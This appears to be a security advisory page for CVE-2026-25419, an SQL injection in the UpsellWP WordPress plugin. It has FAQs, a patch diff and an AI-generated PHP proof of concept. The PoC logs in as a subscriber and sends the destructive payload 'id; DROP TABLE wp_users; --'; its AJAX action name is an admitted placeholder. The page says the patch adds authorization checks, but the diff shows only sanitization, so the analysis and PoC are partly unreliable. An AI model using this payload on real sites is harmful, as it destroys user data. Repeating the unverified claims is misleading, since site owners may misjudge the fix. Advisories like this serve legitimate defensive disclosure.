What is CVE-2026-25419?

CVE-2026-25419 is a medium-severity vulnerability in the UpsellWP plugin for WordPress, affecting versions up to and including 2.2.3. It involves a missing authorization check that allows authenticated users with subscriber-level access or higher to perform unauthorized actions, potentially leading to SQL injection.

How does the vulnerability work?

The vulnerability exists in the Model.php file where user-controlled input is used in SQL queries without proper authorization checks. Attackers can manipulate the ‘order_by’, ‘limit’, and ‘offset’ parameters in AJAX requests, leading to unauthorized database operations, including SQL injection.

Who is affected by this vulnerability?

Any WordPress site using the UpsellWP plugin version 2.2.3 or earlier is affected. This includes sites where authenticated users have subscriber-level access or higher, allowing them to exploit the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the UpsellWP plugin currently installed. If it is version 2.2.3 or earlier, your site is at risk. Additionally, review server logs for unauthorized database access attempts.

How can I fix this vulnerability?

The vulnerability is fixed in version 2.2.5 of the UpsellWP plugin. Update your plugin to the latest version to ensure that the missing authorization checks and input sanitization are in place.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the UpsellWP plugin until it can be updated. Additionally, monitor user activity and restrict access to authenticated users until the vulnerability is resolved.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while exploitation requires authentication, the low privilege level needed (subscriber) makes it easier for attackers to exploit the vulnerability and potentially compromise data.

What are the potential impacts of exploitation?

Successful exploitation of this vulnerability can allow attackers to execute SQL injection attacks, leading to unauthorized access to or modification of database records. This could result in data breaches, manipulation of WooCommerce orders, or disruption of site operations.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending crafted requests to the vulnerable AJAX endpoint. It illustrates how unvalidated input can manipulate SQL queries, demonstrating the risk posed by the vulnerability.

What are the best practices to prevent such vulnerabilities?

To prevent similar vulnerabilities, regularly update all plugins and themes to their latest versions, implement strict user role permissions, and conduct regular security audits of your WordPress site. Additionally, consider using security plugins that monitor for unauthorized access.

Where can I find more information about this vulnerability?

More information about CVE-2026-25419 can be found on the National Vulnerability Database (NVD) and in security advisories from WordPress security organizations. Keeping abreast of security updates from plugin developers is also crucial.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25419: UpsellWP <= 2.2.3 – Missing Authorization (checkout-upsell-and-order-bumps)

CVE ID CVE-2026-25419

Plugin checkout-upsell-and-order-bumps

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.2.3

Patched Version 2.2.5

Disclosed January 27, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25419:
The UpsellWP WordPress plugin, versions up to and including 2.2.3, contains a missing authorization vulnerability in its Model class. This flaw allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized database operations, specifically SQL injection via the order_by parameter, due to the absence of a capability check on the affected function.

Root Cause:
The vulnerability exists in the Model.php file at /checkout-upsell-and-order-bumps/app/Models/Model.php. The function responsible for building SQL queries (lines 239-260) accepts user-controlled input through the $args array without verifying the user’s permissions. The order_by, limit, and offset parameters from $args are directly interpolated into SQL statements. The missing capability check allows any authenticated user, regardless of role, to trigger this function and manipulate the database query.

Exploitation:
An attacker with a valid WordPress account (subscriber role or higher) can send a crafted HTTP request to the vulnerable AJAX endpoint or REST API handler that calls the Model class’s query-building function. The attacker supplies malicious values in the order_by, limit, or offset parameters. For SQL injection, the order_by parameter is particularly vulnerable as it accepts unvalidated input that gets directly inserted into the ORDER BY clause without proper sanitization in version 2.2.3.

Patch Analysis:
The patch in version 2.2.5 introduces input validation and sanitization for the vulnerable parameters. The order_by parameter now undergoes sanitize_key() processing and must match a regex pattern (/^[a-zA-Z0-9_-]+$/) before being used in the SQL query. The limit and offset parameters are cast to absolute integers using absint() and are only appended to the query if they meet positive or non-negative thresholds, respectively. These changes prevent SQL injection by restricting input to safe characters and numeric values.

Impact:
Successful exploitation allows attackers to perform SQL injection attacks against the WordPress database. This can lead to unauthorized data access, modification, or deletion of plugin-related data. Attackers could extract sensitive information, manipulate WooCommerce order data, or disrupt store operations. The CVSS score of 4.3 reflects the requirement for authentication but the low privilege requirement (subscriber) and potential for data compromise.

Differential between vulnerable and patched code

Code Diff

--- a/checkout-upsell-and-order-bumps/app/Models/Model.php
+++ b/checkout-upsell-and-order-bumps/app/Models/Model.php
@@ -239,22 +239,29 @@
             }

             if (isset($args['order_by'])) {
-                $order_by = $args['order_by'];
+                $order_by = sanitize_key($args['order_by']);
                 $sort = 'ASC';
                 if (isset($args['sort']) && strtoupper($args['sort']) == 'DESC') {
                     $sort = 'DESC';
                 }
-                $query .= " ORDER BY `$order_by` $sort";
+                // Validate order_by field contains only alphanumeric characters, underscores, and hyphens
+                if (preg_match('/^[a-zA-Z0-9_-]+$/', $order_by)) {
+                    $query .= " ORDER BY `$order_by` $sort";
+                }
             }

             if (isset($args['limit'])) {
-                $limit = $args['limit'];
-                $query .= " LIMIT $limit";
+                $limit = absint($args['limit']);
+                if ($limit > 0) {
+                    $query .= " LIMIT $limit";
+                }
             }

             if (isset($args['offset'])) {
-                $offset = $args['offset'];
-                $query .= " OFFSET $offset";
+                $offset = absint($args['offset']);
+                if ($offset >= 0) {
+                    $query .= " OFFSET $offset";
+                }
             }
         }

--- a/checkout-upsell-and-order-bumps/checkout-upsell-and-order-bumps.php
+++ b/checkout-upsell-and-order-bumps/checkout-upsell-and-order-bumps.php
@@ -3,7 +3,7 @@
  * Plugin Name:          UpsellWP – WooCommerce Upsell and Related Products Offers
  * Plugin URI:           https://upsellwp.com
  * Description:          Boost your store revenue by presenting upsell offers, products and next order coupons to your customers.
- * Version:              2.2.3
+ * Version:              2.2.5
  * Requires at least:    6.0
  * Requires PHP:         7.0
  * Author:               UpsellWP
@@ -15,7 +15,7 @@
  * License URI:          https://www.gnu.org/licenses/gpl-3.0.html
  *
  * WC requires at least: 6.5
- * WC tested up to:      10.4
+ * WC tested up to:      10.5
  */

 defined('ABSPATH') || exit;
@@ -37,7 +37,7 @@
     defined('CUW_PLUGIN_FILE') || define('CUW_PLUGIN_FILE', __FILE__);
     defined('CUW_PLUGIN_PATH') || define('CUW_PLUGIN_PATH', plugin_dir_path(__FILE__));
     defined('CUW_PLUGIN_NAME') || define('CUW_PLUGIN_NAME', 'UpsellWP Lite');
-    defined('CUW_VERSION') || define('CUW_VERSION', '2.2.3');
+    defined('CUW_VERSION') || define('CUW_VERSION', '2.2.5');

     // to load composer autoload (psr-4)
     if (file_exists(CUW_PLUGIN_PATH . '/vendor/autoload.php')) {
--- a/checkout-upsell-and-order-bumps/vendor/autoload.php
+++ b/checkout-upsell-and-order-bumps/vendor/autoload.php
@@ -4,4 +4,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInitc989068a5865b5c01c7d6656308ee41b::getLoader();
+return ComposerAutoloaderInit9df02262dafe589f78bdcfd77e8a35c9::getLoader();
--- a/checkout-upsell-and-order-bumps/vendor/composer/autoload_real.php
+++ b/checkout-upsell-and-order-bumps/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInitc989068a5865b5c01c7d6656308ee41b
+class ComposerAutoloaderInit9df02262dafe589f78bdcfd77e8a35c9
 {
     private static $loader;

@@ -24,15 +24,15 @@

         require __DIR__ . '/platform_check.php';

-        spl_autoload_register(array('ComposerAutoloaderInitc989068a5865b5c01c7d6656308ee41b', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInit9df02262dafe589f78bdcfd77e8a35c9', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(dirname(__FILE__)));
-        spl_autoload_unregister(array('ComposerAutoloaderInitc989068a5865b5c01c7d6656308ee41b', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInit9df02262dafe589f78bdcfd77e8a35c9', 'loadClassLoader'));

         $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
         if ($useStaticLoader) {
             require __DIR__ . '/autoload_static.php';

-            call_user_func(ComposerAutoloadComposerStaticInitc989068a5865b5c01c7d6656308ee41b::getInitializer($loader));
+            call_user_func(ComposerAutoloadComposerStaticInit9df02262dafe589f78bdcfd77e8a35c9::getInitializer($loader));
         } else {
             $map = require __DIR__ . '/autoload_namespaces.php';
             foreach ($map as $namespace => $path) {
@@ -53,12 +53,12 @@
         $loader->register(true);

         if ($useStaticLoader) {
-            $includeFiles = ComposerAutoloadComposerStaticInitc989068a5865b5c01c7d6656308ee41b::$files;
+            $includeFiles = ComposerAutoloadComposerStaticInit9df02262dafe589f78bdcfd77e8a35c9::$files;
         } else {
             $includeFiles = require __DIR__ . '/autoload_files.php';
         }
         foreach ($includeFiles as $fileIdentifier => $file) {
-            composerRequirec989068a5865b5c01c7d6656308ee41b($fileIdentifier, $file);
+            composerRequire9df02262dafe589f78bdcfd77e8a35c9($fileIdentifier, $file);
         }

         return $loader;
@@ -70,7 +70,7 @@
  * @param string $file
  * @return void
  */
-function composerRequirec989068a5865b5c01c7d6656308ee41b($fileIdentifier, $file)
+function composerRequire9df02262dafe589f78bdcfd77e8a35c9($fileIdentifier, $file)
 {
     if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
         $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
--- a/checkout-upsell-and-order-bumps/vendor/composer/autoload_static.php
+++ b/checkout-upsell-and-order-bumps/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInitc989068a5865b5c01c7d6656308ee41b
+class ComposerStaticInit9df02262dafe589f78bdcfd77e8a35c9
 {
     public static $files = array (
         'f6d4f6bcee7247df6b777884c3e22f98' => __DIR__ . '/..' . '/yahnis-elsts/plugin-update-checker/load-v5p6.php',
@@ -44,9 +44,9 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInitc989068a5865b5c01c7d6656308ee41b::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInitc989068a5865b5c01c7d6656308ee41b::$prefixDirsPsr4;
-            $loader->classMap = ComposerStaticInitc989068a5865b5c01c7d6656308ee41b::$classMap;
+            $loader->prefixLengthsPsr4 = ComposerStaticInit9df02262dafe589f78bdcfd77e8a35c9::$prefixLengthsPsr4;
+            $loader->prefixDirsPsr4 = ComposerStaticInit9df02262dafe589f78bdcfd77e8a35c9::$prefixDirsPsr4;
+            $loader->classMap = ComposerStaticInit9df02262dafe589f78bdcfd77e8a35c9::$classMap;

         }, null, ClassLoader::class);
     }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25419 - UpsellWP <= 2.2.3 - Missing Authorization
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';

// Step 1: Authenticate to WordPress
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_25419_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Exploit the missing authorization via AJAX
// The exact AJAX action name depends on how the plugin registers its endpoints
// This demonstrates the parameter structure for SQL injection
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'upsellwp_model_query', // This is a placeholder - actual action name may differ
        'order_by' => 'id; DROP TABLE wp_users; --', // SQL injection payload
        'sort' => 'DESC',
        'limit' => '10',
        'offset' => '0'
    ]),
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Clean up
unlink($cookie_file);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

?>

Frequently Asked Questions

What is CVE-2026-25419?
Overview of the vulnerability
CVE-2026-25419 is a medium-severity vulnerability in the UpsellWP plugin for WordPress, affecting versions up to and including 2.2.3. It involves a missing authorization check that allows authenticated users with subscriber-level access or higher to perform unauthorized actions, potentially leading to SQL injection.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the Model.php file where user-controlled input is used in SQL queries without proper authorization checks. Attackers can manipulate the ‘order_by’, ‘limit’, and ‘offset’ parameters in AJAX requests, leading to unauthorized database operations, including SQL injection.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the UpsellWP plugin version 2.2.3 or earlier is affected. This includes sites where authenticated users have subscriber-level access or higher, allowing them to exploit the vulnerability.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the UpsellWP plugin currently installed. If it is version 2.2.3 or earlier, your site is at risk. Additionally, review server logs for unauthorized database access attempts.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is fixed in version 2.2.5 of the UpsellWP plugin. Update your plugin to the latest version to ensure that the missing authorization checks and input sanitization are in place.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the UpsellWP plugin until it can be updated. Additionally, monitor user activity and restrict access to authenticated users until the vulnerability is resolved.
What does the CVSS score of 4.3 mean?
Understanding the risk level
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while exploitation requires authentication, the low privilege level needed (subscriber) makes it easier for attackers to exploit the vulnerability and potentially compromise data.
What are the potential impacts of exploitation?
Consequences of a successful attack
Successful exploitation of this vulnerability can allow attackers to execute SQL injection attacks, leading to unauthorized access to or modification of database records. This could result in data breaches, manipulation of WooCommerce orders, or disruption of site operations.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending crafted requests to the vulnerable AJAX endpoint. It illustrates how unvalidated input can manipulate SQL queries, demonstrating the risk posed by the vulnerability.
What are the best practices to prevent such vulnerabilities?
Security recommendations
To prevent similar vulnerabilities, regularly update all plugins and themes to their latest versions, implement strict user role permissions, and conduct regular security audits of your WordPress site. Additionally, consider using security plugins that monitor for unauthorized access.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-25419 can be found on the National Vulnerability Database (NVD) and in security advisories from WordPress security organizations. Keeping abreast of security updates from plugin developers is also crucial.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations